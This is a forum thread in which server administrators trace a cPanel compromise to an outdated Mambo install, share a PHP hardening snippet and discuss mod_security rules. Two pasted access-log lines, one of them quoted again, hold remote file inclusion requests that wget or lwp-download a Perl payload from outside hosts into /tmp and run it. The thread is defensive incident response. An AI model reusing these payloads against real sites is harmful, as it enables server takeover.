Howto locate source of hacked server

[garnar]

My cpanel server running :

WHM 10.8.0 cPanel 10.8.1-R113
Fedora i686 - WHM X v3.1.0

has been hacked into. On boot I get this inetd service that loads up and hogs most of the cpu/ram. After time it will spawn other inetd processess run as user nobody. I am unable to locate the source of where this is started from. These are the processes:

24668 nobody 0 26.1 0.2 inetd
24963 nobody 0 25.5 0.2 inetd
25017 nobody 0 25.2 0.2 inetd
23896 nobody 0 22.9 0.2 /var/sbin/whos
23999 nobody 0 19.9 0.2 /var/tmp/whos
17984 nobody 0 19.6 0.2 inetd
18311 nobody 0 19.6 0.2 inetd
18641 nobody 0 19.3 0.2 inetd
26543 nobody 0 19.3 0.2 inetd

Running netstat I see this:
tcp 0 80 cpanel.binghamXXX.XXX:36689 ircd-188.buy-a-shell.n:ircd ESTA BLISHED
tcp 0 80 cpanel.binghamXXX.XXX:36690 ircd-188.buy-a-shell.n:ircd ESTA

I am not running any IRC server's on this machine so I know something is wrong here. I would like to be able to locate where this fake inetd starts from and kill it. Thanks in advance for any help.

 

[chirpy]

It's too broad a subject to cover the issue in a forum thread and you'd be advised to hire a security expert.

That said, using tools such as lsof will help you track down the location of exploits:

lsof -p 24668 | more

After cleaning up the mess, the next major step is finding out how they got in, and that involves trawling all your web logs in:

/usr/local/apache/logs/*
/usr/local/apache/domlogs/*

The process name is usually completely meaningless as any script or binary can change its name - indeed it's what they do to try and avoid detection and likely has nothing to do with inetd.

 

[garnar]

Thanks for the tip, I was just looking for a few commands to tie a process to a file that I could find on the system.

 

[clara]

I have the exact same issue, CPU runs too high because od nobody-inted proccess, and there is no way I can access any any site nor whm, nor cpanel. I have to reboot the system just to see the same thing in a few hours.

 

[garnar]

This is due to a Mambo install that is not up2date. What happens is they use a php exploit to download a file from a remote server then it spawns multi fake inetd deamons that act as IRC servers/ port scanners and god knows what else. Take a look at getting your mambo sites patched. The CP script to auto install installs a version that is out of date and has know exploits for it.

in your index.php index2.php files you need to use this code at the top. Also I suggest doing this for the index files located in the administrator dir. Additionaly you might want to passwd protect the admin dir.

/** Set flag that this is a parent file */
define( '_VALID_MOS', 1 );
$protects = array('_REQUEST', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER', '_ENV', 'GLOBALS', '_SESSION');

foreach ($protects as $protect) {
if ( in_array($protect , array_keys($_REQUEST)) ||
in_array($protect , array_keys($_GET)) ||
in_array($protect , array_keys($_POST)) ||
in_array($protect , array_keys($_COOKIE)) ||
in_array($protect , array_keys($_FILES))) {
die("Invalid Request.");
}
}
// checks for configuration file, if none found loads installation page

 

[brianoz]

Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!!

Anyone know?

 

[garnar]

This is what I have seen so far, I'm looking for the other host that was doing this:

82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

EDIT: Heres the other one, there is one more when I find it i'll let you know

66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -

 

[garnar]

Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!!

Anyone know?

Thats a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesnt happen. Anyone can run code on your server under the user apache runs as.

 

[brianoz]

Thats a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesnt happen.

Yes, ideally, but since Mambo/Joomla don't have an autoupdate function at the moment, this requires
going through a whole server. A mod_security blocking rule is an instant fix, so it's a great idea and works
well for most of the hosting population. Over time, sure, the users can go back and update their Joomla
installations, but that's not something most of us have time to do.

Looks like a standard mod_security rule for wget, which most people should have, will block this, but obviously it's still worth updating
Joomla over time.

Anyone can run code on your server under the user apache runs as.

And, if you run phpsuexec, that's only a normal user. If you run as nobody, then ... well ...
open slather I guess! And, unless I'm confused, if you have the mod_security blocking rule,
then nobody can use the holes anyway, so what's the problem?

This goes back to a basic security principle which is what you were alluding to above. It's not enough to have one level of
security - for instance, just mod_security, because if mod_security fails you're in trouble. You need two levels of security -
updated Joomla/phpBB scripts, as well as mod_security.

 

[linuxserverguy]

This is what I have seen so far, I'm looking for the other host that was doing this:

82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

EDIT: Heres the other one, there is one more when I find it i'll let you know

66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -

can you please tell whats the location to find this logs? ty.

nevermind